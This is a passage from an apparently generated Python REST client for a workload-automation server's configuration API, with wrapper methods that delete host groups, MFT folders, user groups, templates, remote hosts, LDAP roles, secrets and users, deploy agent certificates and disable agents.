        raise ValueError("Missing the required parameter `hostgroup` when calling `delete_host_from_group`")  # noqa: E501
    if params.get('host') is None:
        raise ValueError("Missing the required parameter `host` when calling `delete_host_from_group`")  # noqa: E501

    path_params = {
        'server': params['server'],  # noqa: E501
        'hostgroup': params['hostgroup'],  # noqa: E501
        'host': params['host'],  # noqa: E501
    }

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/server/{server}/hostgroup/{hostgroup}/agent/{host}', 'DELETE',
        path_params,
        [],  # query_params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='AgentsInGroupSuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_host_group(self, server, hostgroup, **kwargs):  # noqa: E501
    """delete host group  # noqa: E501

    delete host group  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_host_group(server, hostgroup, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the agent is connected to. (required)
    :param str hostgroup: The hostgroup name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper only ever needs the response body, not the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # With async_req the helper returns a request thread, otherwise the
    # deserialized data -- either way it is handed straight to the caller.
    return self.delete_host_group_with_http_info(server, hostgroup, **kwargs)  # noqa: E501
def delete_host_group_with_http_info(self, server, hostgroup, **kwargs):  # noqa: E501
    """delete host group  # noqa: E501

    delete host group  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_host_group_with_http_info(server, hostgroup, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the agent is connected to. (required)
    :param str hostgroup: The hostgroup name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts beyond its positionals.
    accepted = ['server', 'hostgroup', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_host_group" % key
            )
    params = dict(kwargs)
    params['server'] = server
    params['hostgroup'] = hostgroup

    # Both path parameters are mandatory.
    if params.get('server') is None:
        raise ValueError("Missing the required parameter `server` when calling `delete_host_group`")  # noqa: E501
    if params.get('hostgroup') is None:
        raise ValueError("Missing the required parameter `hostgroup` when calling `delete_host_group`")  # noqa: E501

    path_params = {
        'server': params['server'],  # noqa: E501
        'hostgroup': params['hostgroup'],  # noqa: E501
    }

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/server/{server}/hostgroup/{hostgroup}', 'DELETE',
        path_params,
        [],  # query_params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_mft_folder(self, folder_name, **kwargs):  # noqa: E501
    """Delete a virtual folder.  # noqa: E501

    Delete an existing virtual folder in MFT.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_mft_folder(folder_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str folder_name: Name of folder (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper only ever needs the response body, not the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # With async_req the helper returns a request thread, otherwise the
    # deserialized data -- either way it is handed straight to the caller.
    return self.delete_mft_folder_with_http_info(folder_name, **kwargs)  # noqa: E501
def delete_mft_folder_with_http_info(self, folder_name, **kwargs):  # noqa: E501
    """Delete a virtual folder.  # noqa: E501

    Delete an existing virtual folder in MFT.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_mft_folder_with_http_info(folder_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str folder_name: Name of folder (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts beyond its positionals.
    accepted = ['folder_name', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_mft_folder" % key
            )
    params = dict(kwargs)
    params['folder_name'] = folder_name

    # The folder name path parameter is mandatory.
    if params.get('folder_name') is None:
        raise ValueError("Missing the required parameter `folder_name` when calling `delete_mft_folder`")  # noqa: E501

    path_params = {
        'folderName': params['folder_name'],  # noqa: E501
    }

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/mft/virtualfolder/{folderName}', 'DELETE',
        path_params,
        [],  # query_params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_mft_user_group(self, name, **kwargs):  # noqa: E501
    """Delete user group.  # noqa: E501

    Delete user group.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_mft_user_group(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: User group name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper only ever needs the response body, not the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # With async_req the helper returns a request thread, otherwise the
    # deserialized data -- either way it is handed straight to the caller.
    return self.delete_mft_user_group_with_http_info(name, **kwargs)  # noqa: E501
def delete_mft_user_group_with_http_info(self, name, **kwargs):  # noqa: E501
    """Delete user group.  # noqa: E501

    Delete user group.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_mft_user_group_with_http_info(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: User group name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts beyond its positionals.
    accepted = ['name', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_mft_user_group" % key
            )
    params = dict(kwargs)
    params['name'] = name

    # The group name path parameter is mandatory.
    if params.get('name') is None:
        raise ValueError("Missing the required parameter `name` when calling `delete_mft_user_group`")  # noqa: E501

    path_params = {
        'name': params['name'],  # noqa: E501
    }

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/config/mft/usergroup/{name}', 'DELETE',
        path_params,
        [],  # query_params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_pgp_template(self, server, agent, template_name, **kwargs):  # noqa: E501
    """Delete PGP Template  # noqa: E501

    Delete PGP Template  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_pgp_template(server, agent, template_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The PGP Template Name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper only ever needs the response body, not the
    # full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # With async_req the helper returns a request thread, otherwise the
    # deserialized data -- either way it is handed straight to the caller.
    return self.delete_pgp_template_with_http_info(server, agent, template_name, **kwargs)  # noqa: E501
def delete_pgp_template_with_http_info(self, server, agent, template_name, **kwargs):  # noqa: E501
    """Delete PGP Template.

    Issues ``DELETE
    /config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}``.
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response.

    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The PGP Template Name (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unrecognized keyword argument is supplied.
    :raises ValueError: if a required parameter is None.
    """
    # Validate keyword arguments directly instead of snapshotting and
    # mutating locals() (whose mutation semantics are undefined) and
    # iterating via six.iteritems.
    recognized = ('server', 'agent', 'template_name', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_pgp_template" % key
            )
    # Required-parameter checks keep the original error messages exactly.
    if server is None:
        raise ValueError("Missing the required parameter `server` when calling `delete_pgp_template`")  # noqa: E501
    if agent is None:
        raise ValueError("Missing the required parameter `agent` when calling `delete_pgp_template`")  # noqa: E501
    if template_name is None:
        raise ValueError("Missing the required parameter `template_name` when calling `delete_pgp_template`")  # noqa: E501

    path_params = {
        'server': server,
        'agent': agent,
        # REST placeholder name differs from the Python parameter name.
        'templateName': template_name,
    }
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'DELETE',
        path_params,
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def delete_remote_host(self, server, remotehost, **kwargs):  # noqa: E501
    """Delete a remote host from a Server.

    This method makes a synchronous HTTP request by default.  To make
    an asynchronous HTTP request, pass ``async_req=True``:

    >>> thread = api.delete_remote_host(server, remotehost, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the remote host is connected to. (required)
    :param str remotehost: The name of the remote host to delete. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: return only the response data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # Both the sync result and the async request thread come straight
    # from the low-level call, so one delegation suffices.
    return self.delete_remote_host_with_http_info(
        server, remotehost, **kwargs)  # noqa: E501
def delete_remote_host_with_http_info(self, server, remotehost, **kwargs):  # noqa: E501
    """Delete a remote host from a Server.

    Issues ``DELETE /config/server/{server}/remotehost/{remotehost}``.
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response.

    :param async_req bool
    :param str server: The Server the remote host is connected to. (required)
    :param str remotehost: The name of the remote host to delete. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unrecognized keyword argument is supplied.
    :raises ValueError: if a required parameter is None.
    """
    # Validate keyword arguments directly instead of snapshotting and
    # mutating locals() (undefined behavior) via six.iteritems.
    recognized = ('server', 'remotehost', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_remote_host" % key
            )
    # Required-parameter checks keep the original error messages exactly.
    if server is None:
        raise ValueError("Missing the required parameter `server` when calling `delete_remote_host`")  # noqa: E501
    if remotehost is None:
        raise ValueError("Missing the required parameter `remotehost` when calling `delete_remote_host`")  # noqa: E501

    path_params = {'server': server, 'remotehost': remotehost}
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    return self.api_client.call_api(
        '/config/server/{server}/remotehost/{remotehost}', 'DELETE',
        path_params,
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def delete_role_from_ldap_group(self, ldapgroup, role, **kwargs):  # noqa: E501
    """Delete a role from LDAP group.

    This method makes a synchronous HTTP request by default.  To make
    an asynchronous HTTP request, pass ``async_req=True``:

    >>> thread = api.delete_role_from_ldap_group(ldapgroup, role, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ldapgroup: Name of LDAP group (required)
    :param str role: Name of role (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: return only the response data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # One delegation covers both the sync result and the async thread.
    return self.delete_role_from_ldap_group_with_http_info(
        ldapgroup, role, **kwargs)  # noqa: E501
def delete_role_from_ldap_group_with_http_info(self, ldapgroup, role, **kwargs):  # noqa: E501
    """Delete a role from LDAP group.

    Issues ``DELETE /config/authorization/ldap/{ldapgroup}/role/{role}``.
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response.

    :param async_req bool
    :param str ldapgroup: Name of LDAP group (required)
    :param str role: Name of role (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unrecognized keyword argument is supplied.
    :raises ValueError: if a required parameter is None.
    """
    # Validate keyword arguments directly instead of snapshotting and
    # mutating locals() (undefined behavior) via six.iteritems.
    recognized = ('ldapgroup', 'role', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_role_from_ldap_group" % key
            )
    # Required-parameter checks keep the original error messages exactly.
    if ldapgroup is None:
        raise ValueError("Missing the required parameter `ldapgroup` when calling `delete_role_from_ldap_group`")  # noqa: E501
    if role is None:
        raise ValueError("Missing the required parameter `role` when calling `delete_role_from_ldap_group`")  # noqa: E501

    path_params = {'ldapgroup': ldapgroup, 'role': role}
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    return self.api_client.call_api(
        '/config/authorization/ldap/{ldapgroup}/role/{role}', 'DELETE',
        path_params,
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def delete_run_as_user(self, server, agent, user, **kwargs):  # noqa: E501
    """Delete Run-as user from server.

    This method makes a synchronous HTTP request by default.  To make
    an asynchronous HTTP request, pass ``async_req=True``:

    >>> thread = api.delete_run_as_user(server, agent, user, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server. (required)
    :param str agent: The Agent (required)
    :param str user: The user name (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: return only the response data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # One delegation covers both the sync result and the async thread.
    return self.delete_run_as_user_with_http_info(
        server, agent, user, **kwargs)  # noqa: E501
def delete_run_as_user_with_http_info(self, server, agent, user, **kwargs):  # noqa: E501
    """Delete Run-as user from server.

    Issues ``DELETE /config/server/{server}/runasuser/{agent}/{user}``.
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response.

    :param async_req bool
    :param str server: The Server. (required)
    :param str agent: The Agent (required)
    :param str user: The user name (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unrecognized keyword argument is supplied.
    :raises ValueError: if a required parameter is None.
    """
    # Validate keyword arguments directly instead of snapshotting and
    # mutating locals() (undefined behavior) via six.iteritems.
    recognized = ('server', 'agent', 'user', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_run_as_user" % key
            )
    # Required-parameter checks keep the original error messages exactly.
    if server is None:
        raise ValueError("Missing the required parameter `server` when calling `delete_run_as_user`")  # noqa: E501
    if agent is None:
        raise ValueError("Missing the required parameter `agent` when calling `delete_run_as_user`")  # noqa: E501
    if user is None:
        raise ValueError("Missing the required parameter `user` when calling `delete_run_as_user`")  # noqa: E501

    path_params = {'server': server, 'agent': agent, 'user': user}
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    return self.api_client.call_api(
        '/config/server/{server}/runasuser/{agent}/{user}', 'DELETE',
        path_params,
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def delete_secret(self, name, **kwargs):  # noqa: E501
    """Delete an existing secret from the secrets vault.

    This method makes a synchronous HTTP request by default.  To make
    an asynchronous HTTP request, pass ``async_req=True``:

    >>> thread = api.delete_secret(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The name of the secret to update (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: return only the response data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # One delegation covers both the sync result and the async thread.
    return self.delete_secret_with_http_info(name, **kwargs)  # noqa: E501
def delete_secret_with_http_info(self, name, **kwargs):  # noqa: E501
    """Delete an existing secret from the secrets vault.

    Issues ``DELETE /config/secret/{name}``.  Synchronous by default;
    pass ``async_req=True`` to receive the request thread instead of
    the response.

    :param async_req bool
    :param str name: The name of the secret to update (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unrecognized keyword argument is supplied.
    :raises ValueError: if a required parameter is None.
    """
    # Validate keyword arguments directly instead of snapshotting and
    # mutating locals() (undefined behavior) via six.iteritems.
    recognized = ('name', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_secret" % key
            )
    # Required-parameter check keeps the original error message exactly.
    if name is None:
        raise ValueError("Missing the required parameter `name` when calling `delete_secret`")  # noqa: E501

    path_params = {'name': name}
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    return self.api_client.call_api(
        '/config/secret/{name}', 'DELETE',
        path_params,
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def delete_user(self, user, **kwargs):  # noqa: E501
    """Delete user.

    This method makes a synchronous HTTP request by default.  To make
    an asynchronous HTTP request, pass ``async_req=True``:

    >>> thread = api.delete_user(user, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str user: The user name. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: return only the response data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # One delegation covers both the sync result and the async thread.
    return self.delete_user_with_http_info(user, **kwargs)  # noqa: E501
def delete_user_with_http_info(self, user, **kwargs):  # noqa: E501
    """Delete user.

    Issues ``DELETE /config/authorization/user/{user}``.  Synchronous
    by default; pass ``async_req=True`` to receive the request thread
    instead of the response.

    :param async_req bool
    :param str user: The user name. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unrecognized keyword argument is supplied.
    :raises ValueError: if a required parameter is None.
    """
    # Validate keyword arguments directly instead of snapshotting and
    # mutating locals() (undefined behavior) via six.iteritems.
    recognized = ('user', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_user" % key
            )
    # Required-parameter check keeps the original error message exactly.
    if user is None:
        raise ValueError("Missing the required parameter `user` when calling `delete_user`")  # noqa: E501

    path_params = {'user': user}
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    return self.api_client.call_api(
        '/config/authorization/user/{user}', 'DELETE',
        path_params,
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def delete_zos_template(self, server, agent, template_name, **kwargs):  # noqa: E501
    """Delete z/OS Template.

    This method makes a synchronous HTTP request by default.  To make
    an asynchronous HTTP request, pass ``async_req=True``:

    >>> thread = api.delete_zos_template(server, agent, template_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The z/OS Template Name (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: return only the response data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # One delegation covers both the sync result and the async thread.
    return self.delete_zos_template_with_http_info(
        server, agent, template_name, **kwargs)  # noqa: E501
def delete_zos_template_with_http_info(self, server, agent, template_name, **kwargs):  # noqa: E501
    """Delete z/OS Template.

    Issues ``DELETE
    /config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}``.
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response.

    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The z/OS Template Name (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unrecognized keyword argument is supplied.
    :raises ValueError: if a required parameter is None.
    """
    # Validate keyword arguments directly instead of snapshotting and
    # mutating locals() (undefined behavior) via six.iteritems.
    recognized = ('server', 'agent', 'template_name', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_zos_template" % key
            )
    # Required-parameter checks keep the original error messages exactly.
    if server is None:
        raise ValueError("Missing the required parameter `server` when calling `delete_zos_template`")  # noqa: E501
    if agent is None:
        raise ValueError("Missing the required parameter `agent` when calling `delete_zos_template`")  # noqa: E501
    if template_name is None:
        raise ValueError("Missing the required parameter `template_name` when calling `delete_zos_template`")  # noqa: E501

    path_params = {
        'server': server,
        'agent': agent,
        # REST placeholder name differs from the Python parameter name.
        'templateName': template_name,
    }
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'DELETE',
        path_params,
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def deploy_agent_certificate(self, crt_file, ca_chain_file, server, agent, **kwargs):  # noqa: E501
    """Deploy certificate (CRT) on SSL configured Agent.

    This method makes a synchronous HTTP request by default.  To make
    an asynchronous HTTP request, pass ``async_req=True``:

    >>> thread = api.deploy_agent_certificate(crt_file, ca_chain_file, server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str crt_file: (required)
    :param str ca_chain_file: (required)
    :param str server: The Server. (required)
    :param str agent: The Agent. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: return only the response data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # One delegation covers both the sync result and the async thread.
    return self.deploy_agent_certificate_with_http_info(
        crt_file, ca_chain_file, server, agent, **kwargs)  # noqa: E501
def deploy_agent_certificate_with_http_info(self, crt_file, ca_chain_file, server, agent, **kwargs):  # noqa: E501
    """Deploy certificate (CRT) on SSL configured Agent.

    Issues a multipart ``POST /config/server/{server}/agent/{agent}/crt``
    uploading the certificate and CA-chain files.  Synchronous by
    default; pass ``async_req=True`` to receive the request thread
    instead of the response.

    :param async_req bool
    :param str crt_file: (required)
    :param str ca_chain_file: (required)
    :param str server: The Server. (required)
    :param str agent: The Agent. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unrecognized keyword argument is supplied.
    :raises ValueError: if a required parameter is None.
    """
    # Validate keyword arguments directly instead of snapshotting and
    # mutating locals() (undefined behavior) via six.iteritems.
    recognized = ('crt_file', 'ca_chain_file', 'server', 'agent',
                  'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method deploy_agent_certificate" % key
            )
    # Required-parameter checks keep the original error messages exactly.
    if crt_file is None:
        raise ValueError("Missing the required parameter `crt_file` when calling `deploy_agent_certificate`")  # noqa: E501
    if ca_chain_file is None:
        raise ValueError("Missing the required parameter `ca_chain_file` when calling `deploy_agent_certificate`")  # noqa: E501
    if server is None:
        raise ValueError("Missing the required parameter `server` when calling `deploy_agent_certificate`")  # noqa: E501
    if agent is None:
        raise ValueError("Missing the required parameter `agent` when calling `deploy_agent_certificate`")  # noqa: E501

    path_params = {'server': server, 'agent': agent}
    # The two certificate files travel as multipart form-data parts.
    local_var_files = {'crtFile': crt_file, 'caChainFile': ca_chain_file}
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['multipart/form-data']),
    }

    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/crt', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def disable_agent(self, server, agent, **kwargs):  # noqa: E501
    """Disable an Agent.

    This method makes a synchronous HTTP request by default.  To make
    an asynchronous HTTP request, pass ``async_req=True``:

    >>> thread = api.disable_agent(server, agent, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the agent is connected too. (required)
    :param str agent: The Agent to be disabled. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # Convenience wrapper: return only the response data, never the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # One delegation covers both the sync result and the async thread.
    return self.disable_agent_with_http_info(server, agent, **kwargs)  # noqa: E501
def disable_agent_with_http_info(self, server, agent, **kwargs):  # noqa: E501
    """Disable an Agent.

    Issues ``POST /config/server/{server}/agent/{agent}/disable``.
    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead of the response.

    :param async_req bool
    :param str server: The Server the agent is connected too. (required)
    :param str agent: The Agent to be disabled. (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unrecognized keyword argument is supplied.
    :raises ValueError: if a required parameter is None.
    """
    # Validate keyword arguments directly instead of snapshotting and
    # mutating locals() (undefined behavior) via six.iteritems.
    recognized = ('server', 'agent', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method disable_agent" % key
            )
    # Required-parameter checks keep the original error messages exactly.
    if server is None:
        raise ValueError("Missing the required parameter `server` when calling `disable_agent`")  # noqa: E501
    if agent is None:
        raise ValueError("Missing the required parameter `agent` when calling `disable_agent`")  # noqa: E501

    path_params = {'server': server, 'agent': agent}
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),
    }

    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/disable', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SuccessData',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
